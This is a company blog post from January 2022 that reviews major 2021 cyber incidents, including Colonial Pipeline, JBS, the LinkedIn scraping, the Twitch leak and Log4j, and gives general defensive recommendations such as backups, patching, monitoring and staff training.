Cyber security recommendations for 2022: how to not repeat mistakes from 2021?

2022 01 10

Authors: Giedrius Saulėnas, Agnė Marija Bučytė

The essence of cybersecurity is growing rapidly every year, both in society and in the business sector. According to the Identity Theft Resource Center (ITRC), data leakage events globally increased by 17%, comparing 2020 and 2021 January-September months. 

At the end of 2021, IT professionals gave in-depth attention to a critical zero-day vulnerability associated with the software component – Log4j. Untimely software updates and poor security updates of system components provide opportunities for cyber attackers to misappropriate sensitive information and cause damage to internal systems. Events such as the emergence and widespread of the Log4j vulnerability reaffirm the rising cyber threats.   

Ideally, and more notably, companies should take care of the security of their infrastructure and systems before a cyber-attack occurs. For these reasons, in this blog post, we will look at some of the most high-profile cyber-attacks globally in 2021 and present recommendations to help prevent or reduce the damage caused by cyber-attacks to your organisation. 

Ransomware attacks – a growing threat to enterprises

Ransomware is malicious software that forbids access to a device or threatens to expose private information when monetary demands are not met. It is one of the biggest cyber threats to organizations worldwide. Cybersecurity Ventures had predicted that ransomware damage will cost up to 265 billion USD until 2031.  

According to the Sophos State of Ransomware 2021 data, in 2020, data was not encrypted during the 3% ransomware attacks. In 2021, about 7% percent of the attacks did not involve data encryption, but the victims still demanded ransom, meaning the criminals do not bother to encrypt the data – they manipulate victims by leveraging potential fines and reputational losses for the data breaches and ask for a ransom not to publish data to the public. 

In May 2021, an American oil pipeline system Colonial Pipeline experienced a significant cyber-attack by a Russian group of hackers related to the DarkSide group. The pipeline, which transports about 100 million gallons of fuel per day, must be shut down temporarily for the first time in 57 years to contain the attack and prevent the attackers from attacking specific parts of the pipeline. Hackers had stolen over 100 gigabytes of data and requested a ransom of 4.4 million USD worth. Colonial Pipeline paid a massive amount of money to hackers. Although the Department of Justice helped to return the part of the ransom, the attack’s impact led to long lines at gas stations and higher fuel prices.  

Typically, the details of such scale attacks usually remain unknown. Regarding the Colonial Pipeline, it is suspected that the hackers had managed to obtain a password, username and connected to an account used to access a remote computer via VPN. Also, it is still uncertain how attackers obtained the login credentials. There are some speculations that such details may have been leaked on the Dark Web. Furthermore, 2-factor authentication was not present to ensure the account’s security. 

Another huge cyber-attack of May 2021 happened to an American company and the largest beef supplier in the world – JBS. After a ransomware attack, JBS had paid hackers 11 million USD ransom. It only proves that cyber-attacks can cause massive financial losses. Even though experts do not recommend paying a ransom to the attackers, some companies do not have any other choices because of the poor technical possibilities, such as backups, to recover from a hack. It also happened in the JBS case. 

What can we learn from such ransomware attacks? 

Organisations can take multiple recommendations from the mentioned incidents, such as: 

  • Making periodic backups of critical systems is a necessity. If data gets encrypted, restoring it from the backup is the best choice. Remember that it is essential to test backups occasionally to ensure that the restoration process is smooth.  
  • Ensure your systems are patched. The more vulnerabilities there are in the public systems or internal network, the easier it is for the ransomware gangs to initiate an attack.  
  • Follow a security principle – defense-in-depth. The more security layers there are, the harder it is for an attacker. Using advanced security defense tools also helps defend from and investigate attacks.  
  • Periodical employees’ training about cyber security risks – highly recommended. 

Misconfiguration and vulnerabilities lead to high losses 

Improperly configured or outdated software can violate data confidentiality, integrity, and availability. In case of a sensitive data leak because of misconfiguration or existing vulnerabilities, an organization might experience high losses.  

In June 2021, the LinkedIn incident, where more than 90% of user data was exposed, showed what losses software weaknesses could cause. Hackers performed a breach via an API and leaked 700 million LinkedIn user data, including email addresses, full names, phone numbers, addresses, etc. Attackers could use the obtained user details to manipulate and execute specialized phishing attacks or even identity theft. While this situation had not occurred directly from an unpatched system or any serious misconfiguration, this is still an unwanted incident. The dataset was collected by scraping Linkedin API. If the API had some protection regarding rate limiting, or only a person’s contact could check his data, such an incident would not have happened. It is not the first time LinkedIn has had a misfortune happen, but hopefully the last.   

In October 2021, another unexpected cyber incident occurred in the Twitch platform and led to the exposure of confidential data. Such data breach revealed more than 100 GB of Twitch data, including their source code. Hackers managed to locate a server misconfiguration that allowed unauthorized access. The streaming platform faced a lot of backlashes when it uncovered how much some top creators earn annually. Nonetheless, such a cyber-attack affected the platform’s reputation, and Twitch is now considered not secure and unreliable. 

In December 2021, IT specialists discovered zero-day vulnerabilities related to the Log4j library. The Log4j Java library is used in Apache software. Also, it is one of the components in various open-source products, so the scale of this critical vulnerability is enormous, with most organizations affected. With a simple payload, criminals can exploit the remote code execution (RCE) vulnerability and execute malicious code on a remote system leading to data theft. Although it is still a new vulnerability, organisations need to ensure their systems are safe and patched. 

What are the key takeaways from the examples mentioned above? 

We strongly advise to take such actions to lower the risk of the mentioned incidents:  

  • Perform log monitoring to spot abnormalities in the network. 
  • Configure the firewall to allow access only to the needed users. 
  • Periodically, semi-annually or more frequently, perform intrusion testing, risk assessment, and security assessment activities.  
  • Encrypt and backup sensitive data. 
  • Update software timely with released security patches. 

Cyber security recommendations for 2022 

The growing number of cyber incidents makes companies more aware of the risks they might face. However, hackers put even more effort into improving their cyber-attack tactics, techniques, and procedures (TTPs).  

When we are talking about cybersecurity, prevention is crucial. It is essential to prioritize your system’s security, have the needed security procedures, and perform periodic security assessments.  

Employee education is another critical component of managing the risk of experiencing a cyber incident. Phishing is a popular attack vector, and educated users are less likely to be deceived by cybercriminals.  

Finally, enterprises should learn from the mistakes of others rather than their own. It is crucial to make decisions in advance to ensure that the personal data of customers and company proprietary data is secure. It is essential not to delay the needed security actions until too late.  

If you are looking for efficient ways to ensure information security in your organisation, the Baltic Amadeus team is more than happy to help you out.